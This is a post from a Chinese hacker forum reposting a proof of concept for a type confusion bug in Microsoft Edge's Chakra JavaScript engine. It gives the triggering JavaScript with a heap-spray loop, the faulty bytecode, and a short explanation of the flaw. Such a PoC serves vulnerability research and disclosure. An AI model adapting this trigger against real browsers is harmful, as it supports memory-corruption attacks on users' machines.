跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Microsoft Edge Chakra JIT - Parameter Scope Parsing Type Confusion

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
// PoC:

async function trigger(a = class b {
    [await 1]() {
    }
}) {
}

let spray = [];
for (let i = 0; i < 100000; i++) {
    spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}

trigger();

/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.

Here's the generated bytecode.

Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
      18 locals (8 temps from R10), 5 inline cache
    Constant Table:
    ======== =====
     R1 LdRoot    
     R2 LdC_A_I4   int:1 
     R3 Ld_A       (undefined)
     R4 LdFalse   
    
    Implicit Arg Ins:
    ======== === ===
     R5 ArgIn_A    In1
    
    0000   InitUndecl           R6 
    0002   TryCatch             x:004c (  71) 


  Line   1: a = class b {
  Col   24: ^
    0005   BrSrNeq_A            x:0048 (  62)  R5  R3 
    000a   NewScFunc            R13 = b()
    000d   InitClass            R13 
    0012   ProfiledLdFld        R14 = R13.prototype #0 <0> 
    0016   SetHomeObj           R13  R14 
    001b   NewScObjectSimple    R9 
    001d   ProfiledStFld        R9.value = R2 #1 <1> 
    0021   ProfiledStFld        R9.done = R4 #2 <2> 
    0025   Yield                R9  R9   <<-----------------------------------------------
    0028   ResumeYield          R15  R9 
    002b   NewScFunc            R16 = b.prototype[]()
    002e   SetComputedNameVar   R16  R15 
    0033   ProfiledLdFld        R14 = R13.prototype #0 <0> 
    0037   InitClassMemberComputedName R14[R15] = R16
    003d   SetHomeObj           R16  R14 
    0042   InitConst            R6  R13 
    0045   Ld_A                 R5  R13 
    0048   Leave               
    0049   Br                   x:0074 (  40) 
    004c   Catch                R10 
    004e   Nop                 
    004f   ProfiledLdRootFld    R11 = root.Promise #4 <4> 
    0055   ProfiledLdMethodFld  R12 = R11.reject #3 <3> 
    0059   StartCall            ArgCount: 2
    005c   ArgOut_A             Out0 = R11 
    005f   ArgOut_A             Out1 = R10 
    0062   ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3>  <0> 
    006c   Ld_A                 R0  R12 
    006f   Leave               
    0070   Br                   x:0076 (   3) 
    0073   Leave               
    0074   LdUndef              R0 


  Line   5: }
  Col    1: ^
    0076   Ret              

Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。